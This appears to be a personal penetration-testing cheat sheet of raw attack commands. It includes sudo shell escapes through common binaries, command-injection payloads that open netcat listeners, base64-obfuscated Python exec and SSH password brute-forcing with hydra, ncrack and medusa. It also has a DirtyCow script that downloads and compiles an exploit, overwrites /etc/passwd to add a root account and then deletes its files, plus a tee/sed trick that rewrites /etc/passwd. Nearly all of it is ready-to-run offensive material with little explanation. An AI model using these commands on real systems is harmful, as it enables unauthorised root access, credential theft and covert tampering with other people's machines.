
cat /etc/shells
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Sometimes changing source of metasploit disable errors
comment out the affected line e.g.

getting root when have sudo:
  sudo vi -c ':shell'
  
example JtR
sudo ./john /tmp/password --session=neu --format=raw-md5 --wordlist=/usr/share/wordlist/example.dic –rules
sudo ./john /tmp/passwd --wordlist=/home/ich/bin/SecLists-master/Passwords/10_million_password_list_top_100000.txt -rules

WFuzz
sudo python wfuzz.py -c -z file,wordlist/general/big.txt --hc 404 http://vuln/FUZZ

Upload file to compromised server 
python -m SimpleHTTPServer
wget -O /tmp/filename http://192.168.0.2:8000/file

exec a reverse_shell.php e.g.
php -f file.php  

curl -X HEAD/POST/GET/RANDOM...

su -c COMMAND → one command as root

su -m  → root and stay in directory

command injection:

appendings

	; | && || 
  
	ls ; nc -l -p 4444
	ls | nc -l -p 4444
	ls && nc -l -p 4444
	ls 34985ihjf || nc -l -p 4444

	php: escapeshellcmd
	cmd = "ls -laH".escapeshellcmd($_RQUEST['cmd']);
    

import hashlib
python -c exec("import socket...");
print "import socket...".encode(‘base64‘)

823452v34v234234v...==

python -c "exec('823452v34v234234v….=='.decode('base64'))"

hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
	-e s -t 10 if server is to weak to spits errors
	-f to abort if the first usr/pass pair was found

ncrack -p 22 --user root -P 500-worst-passwords.txt 10.10.10.10

medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh

CUPP um pernsonalisierte Passwortlisten zu erstellen
git clone https://github.com/Mebus/cupp.git
python cupp.py -i

wget -r --no-parent http://192.168.2.101/~root/

cat /etc/shells

cat /etc/sudoers 
sudo -l

VIM:
	!/bin/bash
	:shell
more:
	!bash
less:
	v and :shell
find:
	find . -exec bash -i \;
python:
	>>import os
	>> os.system(‘/bin/bash’)
LUA:
	> os.execute("/bin/bash")
PERL:
	exec “/bin/bash”;
RUBY:
	exec “/bin/bash”
awk:
	sudo awk 'BEGIN {system("/bin/bash")}'
nmap:
	echo "os.execute('/bin/sh')" > /tmp/blah.nse
	sudo nmap -script=/tmp/blah.nse

DirtyCow:
	wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
	sleep 1
	gcc -pthread dirtyc0w.c -o dirtycow
	sleep 1
	./dirtycow  /etc/passwd aaa::0:0:,,,:/home/b3:/bin/bash &
	sleep 2
	sudo -S -u  aaa useradd -ou 0 -g 0 blah
	sleep 1
	./dirtycow /etc/passwd root:x:0:0:root:/root:/bin/bash &
	sleep 2
	rm dirtyc0w.c
	rm dirtycow
	sudo -S -u blah find . -exec bash -i \;

GDB:
	echo '!/bin/bash' > /tmp/Gdb
	sudo gdb -batch -x /tmp/Gdb
B3:
	a=$(sudo -l | grep NOPASSWD | head -n 1 | cut -d ":" -f2)
	sudo mv $a{,.back}
	sudo ln -s /bin/bash $a
	sudo $a
	sudo rm $a
	sudo mv $a.back $a

tee:
	user=123::0:0:,,,:/home/b3:/bin/bash
	root=root:x:0:0:root:/root/bin/bash
	cat /etc/passwd  > list.txt
	sed "1s|.*|$user|" list.txt | sudo tee /etc/passwd
	sudo -S -u 123 useradd -ou 0 -g 0 blah
	sed "1s|.*|$root|" /etc/passwd > list.txt
	sudo -S -u blah mv list.txt /etc/passwd
	sudo -S -u blah "/bin/bash"
FTP:
	sudo ftp
	!/bin/bash
man:
	sudo man man
	!bash


